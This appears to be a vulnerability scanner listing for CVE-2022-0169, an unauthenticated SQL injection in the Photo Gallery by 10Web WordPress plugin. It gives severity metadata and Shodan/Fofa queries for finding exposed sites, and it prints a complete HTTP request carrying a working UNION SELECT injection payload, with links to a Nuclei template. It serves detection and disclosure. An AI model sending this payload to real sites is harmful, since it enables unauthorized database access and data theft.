| Title | Photo Gallery by 10Web < 1.6.0 - SQL Injection |
|---|---|
| Author | ritikchaddha,princechaddha |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. |
| Remediation | This is resolved in release 1.6.0. |
| CVSS Score | 9.8 |
| EPSS Score | 0.80785 |
| CVE ID | CVE-2022-0169 |
| CWE ID | CWE-89 |
| Shodan Query | http.html:/wp-content/plugins/photo-gallery |
| Fofa Query | body=/wp-content/plugins/photo-gallery |
| Tags | cve cve2022 wpscan wp wp-plugin wordpress sqli photo-gallery 10web vkev vuln |
The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5(2613),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.17
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0169.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0169.pcap
N/AN/A